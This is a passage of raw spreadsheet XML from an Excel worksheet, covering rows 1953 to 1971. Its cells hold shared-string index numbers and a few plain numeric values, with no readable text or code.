      <c r="T1953" s="12" t="s">
        <v>3999</v>
      </c>
      <c r="U1953" s="12" t="s">
        <v>9750</v>
      </c>
      <c r="V1953" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W1953" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1953" s="12">
        <v>12</v>
      </c>
      <c r="Y1953" s="12" t="s">
        <v>14107</v>
      </c>
    </row>
    <row r="1954" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1954" s="12">
        <v>10124</v>
      </c>
      <c r="B1954" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1954" s="12" t="s">
        <v>30841</v>
      </c>
      <c r="E1954" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F1954" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1954" s="12" t="s">
        <v>14108</v>
      </c>
      <c r="H1954" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1954" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1954" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K1954" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1954" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1954" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1954" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1954" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1954" s="12" t="s">
        <v>14035</v>
      </c>
      <c r="Q1954" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1954" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1954" s="12" t="s">
        <v>14109</v>
      </c>
      <c r="T1954" s="12" t="s">
        <v>1790</v>
      </c>
      <c r="U1954" s="12" t="s">
        <v>14110</v>
      </c>
      <c r="V1954" s="12" t="s">
        <v>8133</v>
      </c>
      <c r="W1954" s="12">
        <v>10396</v>
      </c>
      <c r="X1954" s="12">
        <v>19</v>
      </c>
      <c r="Y1954" s="12" t="s">
        <v>14111</v>
      </c>
    </row>
    <row r="1955" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1955" s="12">
        <v>10128</v>
      </c>
      <c r="B1955" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1955" s="12" t="s">
        <v>31314</v>
      </c>
      <c r="F1955" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G1955" s="12" t="s">
        <v>14112</v>
      </c>
      <c r="H1955" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1955" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1955" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K1955" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1955" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1955" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1955" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1955" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1955" s="12" t="s">
        <v>2856</v>
      </c>
      <c r="Q1955" s="12" t="s">
        <v>28270</v>
      </c>
      <c r="R1955" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1955" s="12" t="s">
        <v>14113</v>
      </c>
      <c r="T1955" s="12" t="s">
        <v>4704</v>
      </c>
      <c r="U1955" s="12" t="s">
        <v>14114</v>
      </c>
      <c r="V1955" s="12" t="s">
        <v>4704</v>
      </c>
      <c r="W1955" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1955" s="12">
        <v>11</v>
      </c>
      <c r="Y1955" s="12" t="s">
        <v>14115</v>
      </c>
    </row>
    <row r="1956" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1956" s="12">
        <v>10129</v>
      </c>
      <c r="B1956" s="12" t="s">
        <v>31208</v>
      </c>
      <c r="D1956" s="12" t="s">
        <v>31189</v>
      </c>
      <c r="E1956" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1956" s="12" t="s">
        <v>31203</v>
      </c>
      <c r="G1956" s="12" t="s">
        <v>14116</v>
      </c>
      <c r="H1956" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1956" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1956" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K1956" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1956" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M1956" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N1956" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O1956" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1956" s="12" t="s">
        <v>2856</v>
      </c>
      <c r="Q1956" s="12" t="s">
        <v>28276</v>
      </c>
      <c r="R1956" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1956" s="12" t="s">
        <v>14117</v>
      </c>
      <c r="T1956" s="12" t="s">
        <v>4704</v>
      </c>
      <c r="U1956" s="12" t="s">
        <v>14118</v>
      </c>
      <c r="V1956" s="12" t="s">
        <v>4704</v>
      </c>
      <c r="W1956" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1956" s="12">
        <v>3</v>
      </c>
      <c r="Y1956" s="12" t="s">
        <v>14119</v>
      </c>
    </row>
    <row r="1957" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1957" s="12">
        <v>10132</v>
      </c>
      <c r="B1957" s="12" t="s">
        <v>30843</v>
      </c>
      <c r="C1957" s="12" t="s">
        <v>30844</v>
      </c>
      <c r="D1957" s="12" t="s">
        <v>30841</v>
      </c>
      <c r="E1957" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1957" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1957" s="12" t="s">
        <v>14120</v>
      </c>
      <c r="H1957" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1957" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1957" s="12" t="s">
        <v>1511</v>
      </c>
      <c r="K1957" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1957" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1957" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1957" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1957" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1957" s="12" t="s">
        <v>14121</v>
      </c>
      <c r="Q1957" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1957" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1957" s="12" t="s">
        <v>14122</v>
      </c>
      <c r="T1957" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="U1957" s="12" t="s">
        <v>14123</v>
      </c>
      <c r="V1957" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W1957" s="12">
        <v>10229</v>
      </c>
      <c r="X1957" s="12">
        <v>7</v>
      </c>
      <c r="Y1957" s="12" t="s">
        <v>14124</v>
      </c>
    </row>
    <row r="1958" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1958" s="12">
        <v>10135</v>
      </c>
      <c r="B1958" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D1958" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1958" s="12" t="s">
        <v>31194</v>
      </c>
      <c r="G1958" s="12" t="s">
        <v>14125</v>
      </c>
      <c r="H1958" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1958" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J1958" s="12" t="s">
        <v>251</v>
      </c>
      <c r="K1958" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1958" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1958" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1958" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1958" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1958" s="12" t="s">
        <v>14126</v>
      </c>
      <c r="Q1958" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1958" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1958" s="12" t="s">
        <v>14127</v>
      </c>
      <c r="T1958" s="12" t="s">
        <v>14128</v>
      </c>
      <c r="U1958" s="12" t="s">
        <v>14129</v>
      </c>
      <c r="V1958" s="12" t="s">
        <v>255</v>
      </c>
      <c r="W1958" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1958" s="12">
        <v>8</v>
      </c>
      <c r="Y1958" s="12" t="s">
        <v>14130</v>
      </c>
    </row>
    <row r="1959" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1959" s="12">
        <v>10138</v>
      </c>
      <c r="B1959" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1959" s="12" t="s">
        <v>30427</v>
      </c>
      <c r="E1959" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1959" s="12" t="s">
        <v>30428</v>
      </c>
      <c r="G1959" s="12" t="s">
        <v>14131</v>
      </c>
      <c r="H1959" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1959" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1959" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K1959" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1959" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1959" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1959" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1959" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1959" s="12" t="s">
        <v>14035</v>
      </c>
      <c r="Q1959" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1959" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1959" s="12" t="s">
        <v>14132</v>
      </c>
      <c r="T1959" s="12" t="s">
        <v>7589</v>
      </c>
      <c r="U1959" s="12" t="s">
        <v>14133</v>
      </c>
      <c r="V1959" s="12" t="s">
        <v>7589</v>
      </c>
      <c r="W1959" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1959" s="12">
        <v>4</v>
      </c>
      <c r="Y1959" s="12" t="s">
        <v>14134</v>
      </c>
    </row>
    <row r="1960" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1960" s="12">
        <v>10139</v>
      </c>
      <c r="B1960" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1960" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1960" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G1960" s="12" t="s">
        <v>14135</v>
      </c>
      <c r="H1960" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1960" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1960" s="12" t="s">
        <v>2575</v>
      </c>
      <c r="K1960" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1960" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1960" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1960" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1960" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1960" s="12" t="s">
        <v>10414</v>
      </c>
      <c r="Q1960" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1960" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1960" s="12" t="s">
        <v>14136</v>
      </c>
      <c r="T1960" s="12" t="s">
        <v>10180</v>
      </c>
      <c r="U1960" s="12" t="s">
        <v>9750</v>
      </c>
      <c r="V1960" s="12" t="s">
        <v>14137</v>
      </c>
      <c r="W1960" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1960" s="12">
        <v>17</v>
      </c>
      <c r="Y1960" s="12" t="s">
        <v>14138</v>
      </c>
    </row>
    <row r="1961" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1961" s="12">
        <v>10140</v>
      </c>
      <c r="B1961" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1961" s="12" t="s">
        <v>30522</v>
      </c>
      <c r="E1961" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1961" s="12" t="s">
        <v>30505</v>
      </c>
      <c r="G1961" s="12" t="s">
        <v>14139</v>
      </c>
      <c r="H1961" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1961" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1961" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K1961" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1961" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1961" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1961" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1961" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1961" s="12" t="s">
        <v>14140</v>
      </c>
      <c r="Q1961" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1961" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1961" s="12" t="s">
        <v>14141</v>
      </c>
      <c r="T1961" s="12" t="s">
        <v>10491</v>
      </c>
      <c r="U1961" s="12" t="s">
        <v>6108</v>
      </c>
      <c r="V1961" s="12" t="s">
        <v>5265</v>
      </c>
      <c r="W1961" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1961" s="12">
        <v>11</v>
      </c>
      <c r="Y1961" s="12" t="s">
        <v>14142</v>
      </c>
    </row>
    <row r="1962" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1962" s="12">
        <v>10146</v>
      </c>
      <c r="B1962" s="12" t="s">
        <v>30520</v>
      </c>
      <c r="C1962" s="12" t="s">
        <v>30521</v>
      </c>
      <c r="D1962" s="12" t="s">
        <v>30522</v>
      </c>
      <c r="E1962" s="12" t="s">
        <v>31474</v>
      </c>
      <c r="F1962" s="12" t="s">
        <v>30505</v>
      </c>
      <c r="G1962" s="12" t="s">
        <v>14147</v>
      </c>
      <c r="H1962" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1962" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J1962" s="12" t="s">
        <v>926</v>
      </c>
      <c r="K1962" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1962" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1962" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1962" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1962" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1962" s="12" t="s">
        <v>14031</v>
      </c>
      <c r="Q1962" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1962" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1962" s="12" t="s">
        <v>14148</v>
      </c>
      <c r="T1962" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1962" s="12" t="s">
        <v>14149</v>
      </c>
      <c r="V1962" s="12" t="s">
        <v>5069</v>
      </c>
      <c r="W1962" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1962" s="12">
        <v>4</v>
      </c>
      <c r="Y1962" s="12" t="s">
        <v>14150</v>
      </c>
    </row>
    <row r="1963" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1963" s="12">
        <v>10148</v>
      </c>
      <c r="B1963" s="12" t="s">
        <v>29980</v>
      </c>
      <c r="C1963" s="12" t="s">
        <v>29959</v>
      </c>
      <c r="D1963" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1963" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F1963" s="12" t="s">
        <v>29975</v>
      </c>
      <c r="G1963" s="12" t="s">
        <v>14155</v>
      </c>
      <c r="H1963" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1963" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1963" s="12" t="s">
        <v>1269</v>
      </c>
      <c r="K1963" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1963" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1963" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1963" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1963" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1963" s="12" t="s">
        <v>14035</v>
      </c>
      <c r="Q1963" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1963" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1963" s="12" t="s">
        <v>14156</v>
      </c>
      <c r="T1963" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1963" s="12" t="s">
        <v>14157</v>
      </c>
      <c r="V1963" s="12" t="s">
        <v>3176</v>
      </c>
      <c r="W1963" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1963" s="12">
        <v>1</v>
      </c>
      <c r="Y1963" s="12" t="s">
        <v>14158</v>
      </c>
    </row>
    <row r="1964" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1964" s="12">
        <v>10149</v>
      </c>
      <c r="B1964" s="12" t="s">
        <v>30836</v>
      </c>
      <c r="D1964" s="12" t="s">
        <v>30841</v>
      </c>
      <c r="E1964" s="12" t="s">
        <v>31452</v>
      </c>
      <c r="F1964" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1964" s="12" t="s">
        <v>14159</v>
      </c>
      <c r="H1964" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1964" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1964" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K1964" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1964" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1964" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1964" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1964" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1964" s="12" t="s">
        <v>14035</v>
      </c>
      <c r="Q1964" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1964" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1964" s="12" t="s">
        <v>14160</v>
      </c>
      <c r="T1964" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1964" s="12" t="s">
        <v>14161</v>
      </c>
      <c r="V1964" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W1964" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1964" s="12">
        <v>2</v>
      </c>
      <c r="Y1964" s="12" t="s">
        <v>14162</v>
      </c>
    </row>
    <row r="1965" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1965" s="12">
        <v>10151</v>
      </c>
      <c r="B1965" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1965" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1965" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G1965" s="12" t="s">
        <v>14163</v>
      </c>
      <c r="H1965" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1965" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1965" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K1965" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1965" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1965" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1965" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1965" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1965" s="12" t="s">
        <v>10337</v>
      </c>
      <c r="Q1965" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1965" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1965" s="12" t="s">
        <v>14164</v>
      </c>
      <c r="T1965" s="12" t="s">
        <v>14165</v>
      </c>
      <c r="U1965" s="12" t="s">
        <v>14166</v>
      </c>
      <c r="V1965" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W1965" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1965" s="12">
        <v>12</v>
      </c>
      <c r="Y1965" s="12" t="s">
        <v>14167</v>
      </c>
    </row>
    <row r="1966" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1966" s="12">
        <v>10152</v>
      </c>
      <c r="B1966" s="12" t="s">
        <v>30520</v>
      </c>
      <c r="C1966" s="12" t="s">
        <v>30521</v>
      </c>
      <c r="D1966" s="12" t="s">
        <v>30522</v>
      </c>
      <c r="E1966" s="12" t="s">
        <v>31474</v>
      </c>
      <c r="F1966" s="12" t="s">
        <v>30505</v>
      </c>
      <c r="G1966" s="12" t="s">
        <v>14168</v>
      </c>
      <c r="H1966" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1966" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1966" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K1966" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1966" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1966" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1966" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1966" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1966" s="12" t="s">
        <v>14031</v>
      </c>
      <c r="Q1966" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1966" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1966" s="12" t="s">
        <v>14169</v>
      </c>
      <c r="T1966" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1966" s="12" t="s">
        <v>14170</v>
      </c>
      <c r="V1966" s="12" t="s">
        <v>5265</v>
      </c>
      <c r="W1966" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1966" s="12">
        <v>14</v>
      </c>
      <c r="Y1966" s="12" t="s">
        <v>14171</v>
      </c>
    </row>
    <row r="1967" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1967" s="12">
        <v>10154</v>
      </c>
      <c r="B1967" s="12" t="s">
        <v>30304</v>
      </c>
      <c r="D1967" s="12" t="s">
        <v>30305</v>
      </c>
      <c r="E1967" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1967" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1967" s="12" t="s">
        <v>14176</v>
      </c>
      <c r="H1967" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1967" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1967" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K1967" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1967" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1967" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1967" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1967" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1967" s="12" t="s">
        <v>14035</v>
      </c>
      <c r="Q1967" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1967" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1967" s="12" t="s">
        <v>14177</v>
      </c>
      <c r="T1967" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1967" s="12" t="s">
        <v>14178</v>
      </c>
      <c r="V1967" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W1967" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1967" s="12">
        <v>2</v>
      </c>
      <c r="Y1967" s="12" t="s">
        <v>14179</v>
      </c>
    </row>
    <row r="1968" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1968" s="12">
        <v>10157</v>
      </c>
      <c r="B1968" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1968" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D1968" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1968" s="12" t="s">
        <v>31474</v>
      </c>
      <c r="F1968" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1968" s="12" t="s">
        <v>14180</v>
      </c>
      <c r="H1968" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1968" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J1968" s="12" t="s">
        <v>926</v>
      </c>
      <c r="K1968" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1968" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M1968" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N1968" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O1968" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1968" s="12" t="s">
        <v>14181</v>
      </c>
      <c r="Q1968" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1968" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1968" s="12" t="s">
        <v>14182</v>
      </c>
      <c r="T1968" s="12" t="s">
        <v>13140</v>
      </c>
      <c r="U1968" s="12" t="s">
        <v>14183</v>
      </c>
      <c r="V1968" s="12" t="s">
        <v>5069</v>
      </c>
      <c r="W1968" s="12">
        <v>10169</v>
      </c>
      <c r="X1968" s="12">
        <v>10</v>
      </c>
      <c r="Y1968" s="12" t="s">
        <v>14184</v>
      </c>
    </row>
    <row r="1969" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1969" s="12">
        <v>10167</v>
      </c>
      <c r="B1969" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1969" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1969" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F1969" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G1969" s="12" t="s">
        <v>14189</v>
      </c>
      <c r="H1969" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1969" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1969" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1969" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1969" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1969" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1969" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1969" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1969" s="12" t="s">
        <v>14031</v>
      </c>
      <c r="Q1969" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1969" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1969" s="12" t="s">
        <v>14190</v>
      </c>
      <c r="T1969" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1969" s="12" t="s">
        <v>14191</v>
      </c>
      <c r="V1969" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W1969" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1969" s="12">
        <v>1</v>
      </c>
      <c r="Y1969" s="12" t="s">
        <v>14192</v>
      </c>
    </row>
    <row r="1970" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1970" s="12">
        <v>10174</v>
      </c>
      <c r="B1970" s="12" t="s">
        <v>30520</v>
      </c>
      <c r="C1970" s="12" t="s">
        <v>30521</v>
      </c>
      <c r="D1970" s="12" t="s">
        <v>30524</v>
      </c>
      <c r="F1970" s="12" t="s">
        <v>30523</v>
      </c>
      <c r="G1970" s="12" t="s">
        <v>14203</v>
      </c>
      <c r="H1970" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1970" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1970" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1970" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1970" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1970" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1970" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1970" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1970" s="12" t="s">
        <v>10337</v>
      </c>
      <c r="Q1970" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1970" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1970" s="12" t="s">
        <v>14204</v>
      </c>
      <c r="T1970" s="12" t="s">
        <v>14205</v>
      </c>
      <c r="U1970" s="12" t="s">
        <v>14206</v>
      </c>
      <c r="V1970" s="12" t="s">
        <v>2034</v>
      </c>
      <c r="W1970" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1970" s="12">
        <v>2</v>
      </c>
      <c r="Y1970" s="12" t="s">
        <v>14207</v>
      </c>
    </row>
    <row r="1971" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1971" s="12">
        <v>10176</v>
      </c>
      <c r="B1971" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1971" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E1971" s="12" t="s">
        <v>31474</v>
      </c>
      <c r="F1971" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1971" s="12" t="s">
        <v>14208</v>
      </c>
      <c r="H1971" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1971" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J1971" s="12" t="s">
        <v>4370</v>
      </c>
      <c r="K1971" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1971" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1971" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1971" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1971" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1971" s="12" t="s">
        <v>14198</v>
      </c>
      <c r="Q1971" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1971" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1971" s="12" t="s">
        <v>14209</v>
      </c>
      <c r="T1971" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1971" s="12" t="s">
        <v>14210</v>
      </c>
      <c r="V1971" s="12" t="s">
